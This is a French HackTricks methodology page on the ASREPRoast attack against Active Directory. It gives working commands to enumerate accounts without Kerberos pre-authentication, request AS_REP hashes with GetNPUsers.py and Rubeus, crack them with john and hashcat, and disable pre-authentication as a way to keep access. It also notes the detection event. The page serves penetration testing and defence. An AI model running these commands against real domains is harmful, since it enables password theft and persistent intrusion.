hacktricks/windows-hardening/active-directory-methodology/asreproast.md
2023-06-03 13:10:46 +00:00

4.6 KiB

ASREPRoast

L'attaque ASREPRoast recherche les utilisateurs sans l'attribut requis de pré-authentification Kerberos (DONT_REQ_PREAUTH).

Cela signifie que n'importe qui peut envoyer une demande AS_REQ au DC au nom de l'un de ces utilisateurs et recevoir un message AS_REP. Ce dernier type de message contient un bloc de données chiffré avec la clé utilisateur d'origine, dérivée de son mot de passe. Ensuite, en utilisant ce message, le mot de passe de l'utilisateur pourrait être craqué hors ligne.

De plus, aucun compte de domaine n'est nécessaire pour effectuer cette attaque, seulement une connexion au DC. Cependant, avec un compte de domaine, une requête LDAP peut être utilisée pour récupérer les utilisateurs sans pré-authentification Kerberos dans le domaine. Sinon, les noms d'utilisateur doivent être devinés.

Énumération des utilisateurs vulnérables (nécessite des informations d'identification de domaine)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Demande de message AS_REP

{% code title="Utilisation de Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% code title="Utilisation de Windows" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} La technique de l'AS-REP Roasting avec Rubeus générera un événement 4768 avec un type de chiffrement de 0x17 et un type de préauthentification de 0. {% endhint %}

Craquage

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

Persistance

Forcer la non-exigence de preauth pour un utilisateur pour lequel vous avez les permissions GenericAll (ou les permissions pour écrire des propriétés):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Références

Plus d'informations sur le Roasting AS-RRP sur ired.team

Suivez HackenProof pour en savoir plus sur les bugs web3

🐞 Lisez des tutoriels sur les bugs web3

🔔 Soyez informé des nouveaux programmes de primes pour bugs

💬 Participez aux discussions de la communauté

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥